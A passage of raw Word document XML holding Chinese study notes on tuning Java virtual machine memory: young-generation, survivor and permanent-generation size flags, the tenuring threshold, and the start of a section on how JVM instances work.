        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区的比值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2:4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>区占整个年轻代的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1/6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-XX:MaxPermSize=16m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设置持久代大小为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>16m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-XX:MaxTenuringThreshold=0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：设置垃圾最大年龄。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>如果设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>的话，则年轻代对象不经过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>区，直接进入年老代</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。对于年老代比较多的应用，可以提高效率。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>如果将此值设置为一个较大值，则年轻代对象会在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Survivor</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>区进行多次复制，这样可以增加对象再年轻代的存活时间</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，增加在年轻代即被回收的概论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB314C" w:rsidRPr="00621676" w:rsidRDefault="00EB314C" w:rsidP="00EB314C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="004C79D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置最大堆</w:t>
      </w:r>
      <w:r w:rsidR="004C79D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="004C79D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最小堆内存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C79D1" w:rsidRPr="00621676" w:rsidRDefault="004C79D1" w:rsidP="004C79D1">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置新生代</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00902DFC" w:rsidRDefault="00902DFC" w:rsidP="00902DFC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>-Xmn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于设置新生代的大小。设置一个较大的新生代会减小老年代的大小，对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为有很大影响。新生代的大小一般设置为整个堆空间的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1/4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1/3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>左右。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00961A3B" w:rsidRDefault="00961A3B" w:rsidP="00902DFC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00961A3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-XX:NewSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于设置新生代的初始大小，</w:t>
      </w:r>
      <w:r w:rsidRPr="00961A3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>-XX:MaxNewSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于设置新生代的最大值。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-Xmn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相当于设置了相同的</w:t>
      </w:r>
      <w:r w:rsidRPr="00961A3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>-XX:NewSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00961A3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>-XX:MaxNewSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00961A3B" w:rsidRDefault="00961A3B" w:rsidP="00902DFC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>若设置不同的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>-XX:NewSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>-XX:MaxNewSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>可能会导致内存震荡，从而产生不必要的系统开销。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C79D1" w:rsidRPr="00621676" w:rsidRDefault="004C79D1" w:rsidP="004C79D1">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="00DE01CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置持久代</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB314C" w:rsidRDefault="00961A3B" w:rsidP="00961A3B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Hot Spot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机中，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-XX:MaxPermSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以设置持久代的最大值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-XX:PermSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以设置持久代的初始大小。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00961A3B" w:rsidRDefault="00961A3B" w:rsidP="00961A3B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>持久代的大小直接决定了系统可以支持多少个类定义和常量。对于使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00790F6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>CGLIB</w:t>
      </w:r>
      <w:r w:rsidRPr="00790F6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00790F6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="00790F6D" w:rsidRPr="00790F6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00790F6D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>ssi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等动态字节码生成工具的应用程序而言，设置合理的持久代大小有助于维持系统稳定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A93705" w:rsidRDefault="00A93705" w:rsidP="00A93705">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="4151755"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="25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 cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="4151755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F035C" w:rsidRPr="00621676" w:rsidRDefault="005F035C" w:rsidP="005F035C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9.6</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调优的几种策略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F035C" w:rsidRPr="00961A3B" w:rsidRDefault="005F035C" w:rsidP="00A93705">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="00F41A4C" w:rsidRDefault="007B2E1A" w:rsidP="00634851">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00634851">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidR="00634851">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实例工作原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634851" w:rsidRPr="0010690F" w:rsidRDefault="00621676" w:rsidP="00634851">
      <w:pPr>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ab/>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>集群环境可能是多个</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进程就是一个</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法启动的，同一个</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的多个</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用都在一个</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里</w:t>
      </w:r>
      <w:r w:rsidR="00634851" w:rsidRPr="0010690F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
